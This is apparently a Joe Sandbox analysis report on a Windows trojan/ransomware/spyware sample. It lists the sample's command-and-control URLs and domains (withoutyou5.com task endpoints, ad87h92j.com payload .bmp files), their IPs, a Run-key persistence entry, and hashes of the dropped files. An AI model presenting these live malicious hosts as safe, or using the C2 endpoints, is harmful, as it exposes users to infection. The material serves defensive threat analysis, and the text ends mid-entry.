                https://mvc.withoutyou5.com/q0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com:443/api.php/common/gettask0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/x0%Avira URL Cloudsafe
                https://passport.jumpw.com/OtherGameUserLogin/CheckGameLogin.jsp?co=10139.https://passport.jumpw.com0%VirustotalBrowse
                http://web.ad87h92j.com/4/long.bmp#knR0%VirustotalBrowse
                https://300.jumpw.com/Activity/cdn/300hero/tojmp/testtojmp.json0%Avira URL Cloudsafe
                http://web.ad87h92j.com/4/text.bmpC:0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/api.php/common/gettask0%VirustotalBrowse
                https://laosiji.swjoy.com/client/api/3524/qr_code.do0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com:443/api.php/common/gettask0%VirustotalBrowse
                https://mvc.withoutyou5.com/c0%Avira URL Cloudsafe
                http://api.jumpw.com/Announcement.html?gameid=0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/api.php/common/gettask?0%Avira URL Cloudsafe
                https://300.jumpw.com/Activity/cdn/300hero/tojmp/testtojmp.json0%VirustotalBrowse
                https://mvc.withoutyou5.com/j0%Avira URL Cloudsafe
                https://www.geonames.org/0%Avira URL Cloudsafe
                https://laosiji.swjoy.com/client/api/3524/qr_code.do0%VirustotalBrowse
                https://data.iana.org/time-zones/tz-link.html0%Avira URL Cloudsafe
                https://www.geonames.org/0%VirustotalBrowse
                https://data.iana.org/time-zones/tz-link.html0%VirustotalBrowse
                https://mvc.withoutyou5.com/j1%VirustotalBrowse
                http://web.ad87h92j.com/4/long.bmp00%Avira URL Cloudsafe
                https://www.geonames.org/Timezone0%Avira URL Cloudsafe
                http://api.jumpw.com/Announcement.html?gameid=0%VirustotalBrowse
                https://mvc.withoutyou5.com/api.php/common/gettaskE0%Avira URL Cloudsafe
                https://www.geonames.org/Timezone0%VirustotalBrowse
                http://web.ad87h92j.com/4/t.bmpmp0%Avira URL Cloudsafe
                https://support.ubi.com/?GenomeId=954e66a0-be1b-4aa0-9690-fb75201e4e9epidRequired0%Avira URL Cloudsafe
                http://www.astro.com/swisseph.0%Avira URL Cloudsafe
                https://cacer.goldenh0ur.com/api.php/common/getdomain0%Avira URL Cloudsafe
                http://api.jumpw.com/Announcement.html?gameid=&channel=Receive0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/api.php/common/gettask_0%Avira URL Cloudsafe
                http://www.astro.com/swisseph.0%VirustotalBrowse
                http://web.ad87h92j.com/4/t.bmpmp0%VirustotalBrowse
                http://sdk.jumpw.com/sdk/AdPodxt0%Avira URL Cloudsafe
                https://support.ubi.com/0%Avira URL Cloudsafe
                http://www.astrolog.org/astrolog.htm0%Avira URL Cloudsafe
                http://api.jumpw.com/Announcement.html?gameid=&channel=Receive0%VirustotalBrowse
                https://mvc.withoutyou5.com/api.php/common/gettasko0%Avira URL Cloudsafe
                http://www.openssl.org/support/faq.html....................0%Avira URL Cloudsafe
                http://web.ad87h92j.com/4/d.bmpWhttp://web.ad87h92j.com/4/t.bmp0%Avira URL Cloudsafe
                http://www.gnu.org0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/api.php/common/receivejson0%Avira URL Cloudsafe
                http://sdk.jumpw.com/sdk/AdPodxtbgImageCustombtnNumbtn%dXbtn%dYbtn%dImgbtn%dTipbtn%dUrlPrgBgImagePrg0%Avira URL Cloudsafe
                http://web.ad87h92j.com/4/long.bmpi0%Avira URL Cloudsafe
                http://sdk.jumpw.com/sdk/AdPodxt0%VirustotalBrowse
                http://web.ad87h92j.com/4/long.bmpwininetShell32msvcrt0%Avira URL Cloudsafe
                http://web.ad87h92j.com/4/text.bmp0%Avira URL Cloudsafe
                http://web.ad87h92j.com/4/long.bmp0%Avira URL Cloudsafe
                http://www.astrolog.org/astrolog.htmMain0%Avira URL Cloudsafe
                https://support.ubi.com/0%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                mvc.withoutyou5.com
                		104.26.6.127
                		truefalse
                  		unknown
                  cacer.goldenh0ur.com
                  		104.21.17.45
                  		truefalse
                    		unknown
                    web.ad87h92j.com
                    		188.114.97.3
                    		truefalseunknown
                    15.164.165.52.in-addr.arpa
                    		unknown
                    		unknownfalseunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://mvc.withoutyou5.com/api.php/common/gettaskfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://cacer.goldenh0ur.com/api.php/common/getdomainfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://mvc.withoutyou5.com/api.php/common/receivejsonfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://web.ad87h92j.com/4/long.bmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://web.ad87h92j.com/4/long.bmpsRudvfa0Z17.exe, 00000000.00000002.3260038071.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://laosiji.swjoy.com/client/api/3172/qr_code.dohttps://laosiji.swjoy.com/client/api/3524/qr_codRudvfa0Z17.exefalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://mvc.withoutyou5.com/U33MwVPy.exe, 00000006.00000002.3882524922.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://mvc.withoutyou5.com/33MwVPy.exe, 00000006.00000002.3882524922.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://laosiji.swjoy.com/client/api/3172/qr_code.doRudvfa0Z17.exefalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https:///api.php/common/gettask/api.php/common/getdomain.200idleActivityTimePlugingsleep33MwVPy.exe, 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000002.3883097194.0000000003258000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000002.3883625638.0000000010064000.00000002.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://data.iana.org/time-zones/tz-link.htmlPostScriptRudvfa0Z17.exe, 00000000.00000003.3116399603.0000000010037000.00000004.00000020.00020000.00000000.sdmp, Rudvfa0Z17.exe, 00000000.00000003.3228816926.0000000003E40000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, 33MwVPy.exe, 00000007.00000002.3354131149.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, 33MwVPy.exe, 00000008.00000002.3436577941.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://curl.haxx.se/docs/http-cookies.htmlRudvfa0Z17.exefalse
                    • URL Reputation: safe
                    		unknown
                    https://300.jumpw.com/Activity/cdn/300hero/tojmp/accesstojmp.jsonRudvfa0Z17.exefalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://mvc.withoutyou5.com/im33MwVPy.exe, 00000006.00000002.3882524922.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.openssl.org/support/faq.htmlRudvfa0Z17.exefalse
                    • URL Reputation: safe
                    		unknown
                    http://web.ad87h92j.com/4/long.bmp#knRRudvfa0Z17.exe, 00000000.00000002.3260038071.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://passport.jumpw.com/OtherGameUserLogin/CheckGameLogin.jsp?co=10139.https://passport.jumpw.comRudvfa0Z17.exefalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://mvc.withoutyou5.com/q33MwVPy.exe, 00000006.00000002.3882524922.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://mvc.withoutyou5.com:443/api.php/common/gettask33MwVPy.exe, 00000006.00000003.3556773695.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000002.3882524922.0000000001377000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://mvc.withoutyou5.com/x33MwVPy.exe, 00000006.00000002.3882524922.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://300.jumpw.com/Activity/cdn/300hero/tojmp/testtojmp.jsonRudvfa0Z17.exefalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://web.ad87h92j.com/4/text.bmpC:Rudvfa0Z17.exe, 00000000.00000002.3260753176.0000000003109000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://laosiji.swjoy.com/client/api/3524/qr_code.doRudvfa0Z17.exefalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://mvc.withoutyou5.com/c33MwVPy.exe, 00000006.00000002.3882524922.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://api.jumpw.com/Announcement.html?gameid=Rudvfa0Z17.exefalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://mvc.withoutyou5.com/api.php/common/gettask?33MwVPy.exe, 00000006.00000003.3775415571.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000003.3556773695.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000003.3556860051.00000000013FB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://mvc.withoutyou5.com/j33MwVPy.exe, 00000006.00000002.3882524922.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.geonames.org/33MwVPy.exe, 33MwVPy.exe, 00000007.00000002.3354131149.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, 33MwVPy.exe, 00000008.00000002.3436577941.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://data.iana.org/time-zones/tz-link.html33MwVPy.exe, 33MwVPy.exe, 00000007.00000002.3354131149.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, 33MwVPy.exe, 00000008.00000002.3436577941.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://web.ad87h92j.com/4/long.bmp0Rudvfa0Z17.exe, 00000000.00000002.3260038071.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.geonames.org/TimezoneRudvfa0Z17.exe, 00000000.00000003.3116399603.0000000010037000.00000004.00000020.00020000.00000000.sdmp, Rudvfa0Z17.exe, 00000000.00000003.3228816926.0000000003E40000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, 33MwVPy.exe, 00000007.00000002.3354131149.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, 33MwVPy.exe, 00000008.00000002.3436577941.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://mvc.withoutyou5.com/api.php/common/gettaskE33MwVPy.exe, 00000006.00000002.3882524922.0000000001377000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://web.ad87h92j.com/4/t.bmpmpRudvfa0Z17.exe, 00000000.00000002.3260753176.0000000003109000.00000004.00000001.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.astro.com/swisseph.libcef.dll.0.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.ubi.com/?GenomeId=954e66a0-be1b-4aa0-9690-fb75201e4e9epidRequired33MwVPy.exe, 00000006.00000002.3881817015.00000000007F3000.00000002.00000001.01000000.0000000A.sdmp, 33MwVPy.exe, 00000007.00000002.3353002512.00000000007F3000.00000002.00000001.01000000.0000000A.sdmp, 33MwVPy.exe, 00000008.00000002.3435532254.00000000007F3000.00000002.00000001.01000000.0000000A.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://api.jumpw.com/Announcement.html?gameid=&channel=ReceiveRudvfa0Z17.exefalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://mvc.withoutyou5.com/api.php/common/gettask_33MwVPy.exe, 00000006.00000002.3882524922.0000000001377000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://sdk.jumpw.com/sdk/AdPodxtRudvfa0Z17.exefalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.ubi.com/33MwVPy.exe, 00000006.00000002.3881817015.00000000007F3000.00000002.00000001.01000000.0000000A.sdmp, 33MwVPy.exe, 00000007.00000002.3353002512.00000000007F3000.00000002.00000001.01000000.0000000A.sdmp, 33MwVPy.exe, 00000008.00000002.3435532254.00000000007F3000.00000002.00000001.01000000.0000000A.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.astrolog.org/astrolog.htm33MwVPy.exe, 33MwVPy.exe, 00000007.00000002.3354131149.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, 33MwVPy.exe, 00000008.00000002.3436577941.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://mvc.withoutyou5.com/api.php/common/gettasko33MwVPy.exe, 00000006.00000002.3882524922.0000000001377000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.openssl.org/support/faq.html....................Rudvfa0Z17.exefalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://web.ad87h92j.com/4/d.bmpWhttp://web.ad87h92j.com/4/t.bmpRudvfa0Z17.exe, 00000000.00000002.3260753176.0000000003109000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.gnu.orglibcef.dll.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://sdk.jumpw.com/sdk/AdPodxtbgImageCustombtnNumbtn%dXbtn%dYbtn%dImgbtn%dTipbtn%dUrlPrgBgImagePrgRudvfa0Z17.exefalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://web.ad87h92j.com/4/long.bmpiRudvfa0Z17.exe, 00000000.00000002.3260038071.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://web.ad87h92j.com/4/long.bmpwininetShell32msvcrtRudvfa0Z17.exe, 00000000.00000002.3259526333.000000000019D000.00000004.00000010.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://web.ad87h92j.com/4/text.bmpRudvfa0Z17.exe, 00000000.00000002.3260038071.00000000008E9000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.astrolog.org/astrolog.htmMainRudvfa0Z17.exe, 00000000.00000003.3116399603.0000000010037000.00000004.00000020.00020000.00000000.sdmp, Rudvfa0Z17.exe, 00000000.00000003.3228816926.0000000003E40000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, 33MwVPy.exe, 00000007.00000002.3354131149.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, 33MwVPy.exe, 00000008.00000002.3436577941.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    104.21.17.45
                    		cacer.goldenh0ur.comUnited States
                    		13335CLOUDFLARENETUSfalse
                    188.114.97.3
                    		web.ad87h92j.comEuropean Union
                    		13335CLOUDFLARENETUSfalse
                    104.26.6.127
                    		mvc.withoutyou5.comUnited States
                    		13335CLOUDFLARENETUSfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1499612
                    Start date and time:2024-08-27 09:46:27 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 4s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Run name:Run with higher sleep bypass
                    Number of analysed new started processes analysed:9
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Rudvfa0Z17.exe
                    renamed because original name is a hash value
                    Original Sample Name:44d3fbf225fc3e6ae2bf8b68f3dd69fc180d29e2b69ff8f53c83ce78c07845ce.exe
                    Detection:MAL
                    Classification:mal100.rans.bank.troj.spyw.evad.winEXE@6/8@4/3
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 84%
                    • Number of executed functions: 73
                    • Number of non-executed functions: 294
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    09:49:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WINDOWS C:\Program Files (x86)\90m3FHO\33MwVPy.exe
                    09:49:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WINDOWS C:\Program Files (x86)\90m3FHO\33MwVPy.exe

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    188.114.97.3nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                    • web.ad87h92j.com/4/t.bmp
                    QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                    • filetransfer.io/data-package/0U9QqTZ6/download
                    QUOTATION_AUGQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • filetransfer.io/data-package/e0pM9Trc/download
                    steam_module_x64.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                    • 671893cm.n9shka.top/eternalpipeLowProcessDbDatalifewpPublicCdn.php
                    http://membership.garenaa.id.vn/css/tunnel.aspx/manager10.jspGet hashmaliciousUnknownBrowse
                    • membership.garenaa.id.vn/user/login/images/fb_ico.png
                    Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                    • lysyvan.com/login.php
                    700987654656676.exeGet hashmaliciousDBatLoader, FormBookBrowse
                    • www.coinwab.com/kqqj/?eJ=7HHhUI7NBywWL5iw6vBoOC1R9nc6cE2Y1UmgCStXrWBBqhu9PJUZU2f6gs8mUMG7LvvYO9vLlwJ8Ne8neaHQQZFpXb2jdQdMFopJRCp5HeIQieixqdhWtgQ=&zPCT=URo4h
                    PI#220824.exeGet hashmaliciousFormBookBrowse
                    • www.bbyul.shop/1i58/
                    Document 21824RXVPO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                    • www.avantfize.shop/y1j7/
                    PI #9100679047.exeGet hashmaliciousFormBookBrowse
                    • www.bbyul.shop/1i58/?6fQ=evG0&gLc=XqU6jghuSqY8MpCZA7iVsp22hhGmB+aP50JZxBPQHjQb8W504z1krI9n0nehtDU4K/YNHLkqPrKb1IHVqfZj2x+2juMl9gnRGRd/nNq6cBsZ0P16fQsAoUY=

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    web.ad87h92j.comnOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                    • 188.114.97.3

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    CLOUDFLARENETUSCMB Monaco Signatures Consent Docs#299229(Revised).pdfGet hashmaliciousUnknownBrowse
                    • 104.18.95.41
                    nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                    • 104.20.23.46
                    https://docs.google.com/presentation/d/1p772m5RM1IL7T2czRhP4f72F4IrvoiS4-fTTq6BpzJg/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                    • 104.20.23.46
                    file.exeGet hashmaliciousUnknownBrowse
                    • 172.64.41.3
                    Feature Status Update D583R.htmlGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    GP Design INV20230103 $68,320.exeGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                    • 172.67.220.161
                    Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    CLOUDFLARENETUSCMB Monaco Signatures Consent Docs#299229(Revised).pdfGet hashmaliciousUnknownBrowse
                    • 104.18.95.41
                    nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                    • 104.20.23.46
                    https://docs.google.com/presentation/d/1p772m5RM1IL7T2czRhP4f72F4IrvoiS4-fTTq6BpzJg/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                    • 104.20.23.46
                    file.exeGet hashmaliciousUnknownBrowse
                    • 172.64.41.3
                    Feature Status Update D583R.htmlGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    GP Design INV20230103 $68,320.exeGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                    • 172.67.220.161
                    Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    CLOUDFLARENETUSCMB Monaco Signatures Consent Docs#299229(Revised).pdfGet hashmaliciousUnknownBrowse
                    • 104.18.95.41
                    nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                    • 104.20.23.46
                    https://docs.google.com/presentation/d/1p772m5RM1IL7T2czRhP4f72F4IrvoiS4-fTTq6BpzJg/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                    • 104.20.23.46
                    file.exeGet hashmaliciousUnknownBrowse
                    • 172.64.41.3
                    Feature Status Update D583R.htmlGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    GP Design INV20230103 $68,320.exeGet hashmaliciousUnknownBrowse
                    • 188.114.97.3
                    Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                    • 172.67.220.161
                    Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                    • 188.114.96.3

                    JA3 Fingerprints

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    a0e9f5d64349fb13191bc781f81f42e1Pago pendientes.xlsGet hashmaliciousHTMLPhisherBrowse
                    • 104.26.6.127
                    • 104.21.17.45
                    French Group.jsGet hashmaliciousRemcosBrowse
                    • 104.26.6.127
                    • 104.21.17.45
                    NwFP.exeGet hashmaliciousSmokeLoaderBrowse
                    • 104.26.6.127
                    • 104.21.17.45
                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                    • 104.26.6.127
                    • 104.21.17.45
                    file.exeGet hashmaliciousLummaC, VidarBrowse
                    • 104.26.6.127
                    • 104.21.17.45
                    Mi_Documento.jsGet hashmaliciousAsyncRAT, DcRatBrowse
                    • 104.26.6.127
                    • 104.21.17.45
                    French Group.jsGet hashmaliciousUnknownBrowse
                    • 104.26.6.127
                    • 104.21.17.45
                    SecuriteInfo.com.Riskware.2144FlashPlayer.13074.5713.exeGet hashmaliciousUnknownBrowse
                    • 104.26.6.127
                    • 104.21.17.45
                    SecuriteInfo.com.Riskware.2144FlashPlayer.13074.5713.exeGet hashmaliciousUnknownBrowse
                    • 104.26.6.127
                    • 104.21.17.45
                    6rfHnQpz6K.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 104.26.6.127
                    • 104.21.17.45

                    Dropped Files

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Program Files (x86)\90m3FHO\33MwVPy.exenOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                      C:\Program Files (x86)\90m3FHO\libcef.dllnOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                        C:\Program Files (x86)\90m3FHO\MSVCP140.dllnOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                          https://downloads.linktek.com/LR/SetupLinkReporter.zipGet hashmaliciousUnknownBrowse
                            C:\Program Files (x86)\90m3FHO\VCRUNTIME140.dllnOyswc9ly2.dllGet hashmaliciousUnknownBrowse

                              Created / dropped Files

                              C:\Program Files (x86)\90m3FHO\33MwVPy.exe

                              Download File
                              Process:C:\Users\user\Desktop\Rudvfa0Z17.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):6453568
                              Entropy (8bit):7.944493660771585
                              Encrypted:false
                              SSDEEP:196608:fW1Hje3HvntQwZSPyl7N6nds1HhmwcOaXr:myvtrxBL1QSaXr
                              MD5:C8E8EEAF5464AF1A188B3DC12C890813
                              SHA1:2DF041366B9DE8A2B982205B15F7264145E81644
                              SHA-256:E528455778D952ACFC5B330B378F2C53CC92E55CFEAB1C1E1DBB52E01D626BB4
                              SHA-512:8119BD5A7FE790F1EBF1B2C5411264C32A193718851746C26183B8A48293D61E8F9F3EEB97CC851A419B5B41038BC63BFFD17E99907AD4F8CDEE63F7151DBE46
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: nOyswc9ly2.dll, Detection: malicious, Browse
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f...............'..?.................0?...@..........................@.......kc.....................................`........0..u............Pb.@)..................................d.}.........@.............{..............................text...R.?......................... ..`.rdata.......0?.....................@..@.data...T.....H.....................@....idata...Q....J.....................@..@.tls......... K.....................@....00cfg.......0K.....................@..@.ubx0...z....@K.....................`..`.ubx1...`A_...y..B_.................`..`.rsrc...u....0.......J_.............@..@........................................................................................................................................................................................................................................................................

                              C:\Program Files (x86)\90m3FHO\MSVCP140.dll

                              Download File
                              Process:C:\Users\user\Desktop\Rudvfa0Z17.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):436600
                              Entropy (8bit):6.647460578716755
                              Encrypted:false
                              SSDEEP:12288:mgU0BGzePo6+J+4P0xYv7IQgihUgiW6QR7t5s03Ooc8dHkC2esMoWKl:I01Po6+J+dxYv7IQgR03Ooc8dHkC2e50
                              MD5:C092885EA11BD80D35CB55C7D488F1E2
                              SHA1:BFE2F5141AF49724A54C838B9A9CB6E54C4A6AA5
                              SHA-256:885A0A146A83B0D5A19B88C4EB6372B648CFAED817BD31D8CD3FB91313DEA13D
                              SHA-512:8A600CCF97A6D5201BB791A43F16CD4CCD19A8E9DECAE79B8BA3E5200B6E8936649626112B1C6BDB1465AB8AFB395803A68286C76B817245C6077D0536D03344
                              Malicious:true
                              Antivirus:
